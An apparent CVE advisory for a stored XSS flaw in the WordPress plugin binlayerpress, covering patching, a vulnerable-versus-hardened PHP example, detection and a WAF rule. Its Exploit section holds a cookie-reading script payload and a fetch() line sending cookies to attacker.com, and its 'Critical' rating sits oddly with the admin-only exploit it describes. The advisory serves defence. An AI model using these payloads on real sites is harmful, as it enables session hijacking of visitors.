How the CVE Works
The `binlayerpress` plugin (≤ v1.1) for WordPress fails to sanitize its admin settings inputs, allowing an attacker with administrator-level access to inject malicious scripts. These scripts persist in the database and execute whenever a user loads a page that renders the stored value. The vulnerability is exploitable only in multi-site setups or where `unfiltered_html` is disabled, as WordPress normally strips scripts via KSES. The stored XSS attack vector (CVSS 4.0: 9.6 Critical) enables session hijacking, defacement, or malware delivery.
DailyCVE Form
Platform: WordPress
Version: ≤1.1
Vulnerability: Stored XSS
Severity: Critical
Date: 04/07/2025
What Undercode Says:
Exploit:
1. Payload Injection:
<script>alert(document.cookie)</script>
Insert via plugin settings (requires admin access).
2. Exfiltrate Sessions:
fetch('https://attacker.com/steal?data='+btoa(document.cookie));
Protection:
1. Patch:
wp plugin update binlayerpress --version=1.2
2. Input Sanitization Fix (strip tags before the option is written):
add_filter('pre_update_option_binlayerpress', 'sanitize_text_field');
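Added illustration of the defect the advisory describes and of the fix applied in the Protection section; this is not the plugin's own code, and the option name `binlayerpress_banner_text`, the form field `blp_banner_text` and the `blp_*` function names are hypothetical. The vulnerable handler stores the raw admin input and echoes it back unescaped; the hardened handler adds a capability check, a nonce, sanitization on save (the same `sanitize_text_field` hook form shown above) and escaping on output.

```php
<?php
// Added example, not the plugin's own code. Option/field names are hypothetical.

// VULNERABLE pattern (the defect the advisory describes): the raw settings
// value is stored with no sanitization and later echoed with no escaping, so
// anything saved through the settings page persists in wp_options and runs
// in the browser of every visitor of the page that renders it.
function blp_vuln_save_settings() {
    if ( isset( $_POST['blp_banner_text'] ) ) {
        update_option( 'binlayerpress_banner_text', $_POST['blp_banner_text'] ); // no sanitize
    }
}
function blp_vuln_render_banner() {
    echo get_option( 'binlayerpress_banner_text', '' ); // no escape
}

// HARDENED version: capability check, nonce, sanitize on save, escape on output.
function blp_safe_save_settings() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return; // only administrators may change plugin settings
    }
    check_admin_referer( 'blp_save_settings' ); // CSRF protection for the settings form
    if ( isset( $_POST['blp_banner_text'] ) ) {
        // Strip tags, octets and control characters before the value reaches the DB.
        $clean = sanitize_text_field( wp_unslash( $_POST['blp_banner_text'] ) );
        update_option( 'binlayerpress_banner_text', $clean );
    }
}
function blp_safe_render_banner() {
    // Escape at output as well: a value that is stored clean today may be
    // written unsanitized by another code path tomorrow (defense in depth).
    echo esc_html( get_option( 'binlayerpress_banner_text', '' ) );
}

// Belt-and-braces: sanitize every write to this option, whichever code path
// performs it. Same hook form as the Protection section, keyed to the option
// name; pre_update_option_{$option} passes the new value as first argument.
add_filter( 'pre_update_option_binlayerpress_banner_text', 'sanitize_text_field' );
```

`sanitize_text_field` is appropriate for plain-text settings; a field that legitimately needs limited HTML should use `wp_kses_post` (or `wp_kses` with an explicit allow-list) instead, never raw storage.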
Detection:
1. Scan Plugin:
grep -rn 'echo $_POST' /wp-content/plugins/binlayerpress/   # single quotes so the shell does not expand $_POST
Mitigation:
1. Disable Plugin:
wp plugin deactivate binlayerpress
2. WAF Rule:
location ~ ^/wp-admin/.*\.php$ { if ($args ~* "<script") { return 403; } }   # matches the query string only; POST bodies need a real WAF (e.g. ModSecurity)
Forensics:
1. Log Analysis:
grep "binlayerpress" /var/log/nginx/access.log
References:
- CVE-2025-2076: Wordfence Advisory
- Patch: GitHub/binlayerpresscommit
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2076